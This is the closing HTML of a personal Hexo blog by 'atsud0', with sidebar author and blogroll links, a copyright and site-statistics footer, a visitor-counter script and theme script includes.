        <a href="mailto:admin@atsud0.me" title="E-Mail → mailto:admin@atsud0.me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/atsud0" title="Twitter → https://twitter.com/atsud0" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://t.me/MindworkshopBot" title="Telegram → https://t.me/MindworkshopBot" rel="noopener" target="_blank"><i class="fab fa-telegram fa-fw"></i>Telegram</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.ajin.cloud/" title="https://blog.ajin.cloud/" rel="noopener" target="_blank">ajin</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://leiblog.wang/" title="https://leiblog.wang/" rel="noopener" target="_blank">LeiWang</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://esonhugh.github.io/" title="https://esonhugh.github.io/" rel="noopener" target="_blank">Esonhugh</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://isabellainori.github.io/" title="https://isabellainori.github.io/" rel="noopener" target="_blank">Isabella Ross</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">atsud0</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">Symbols count total: </span>
    <span title="Symbols count total">424k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">Reading time total &asymp;</span>
    <span title="Reading time total">6:26</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
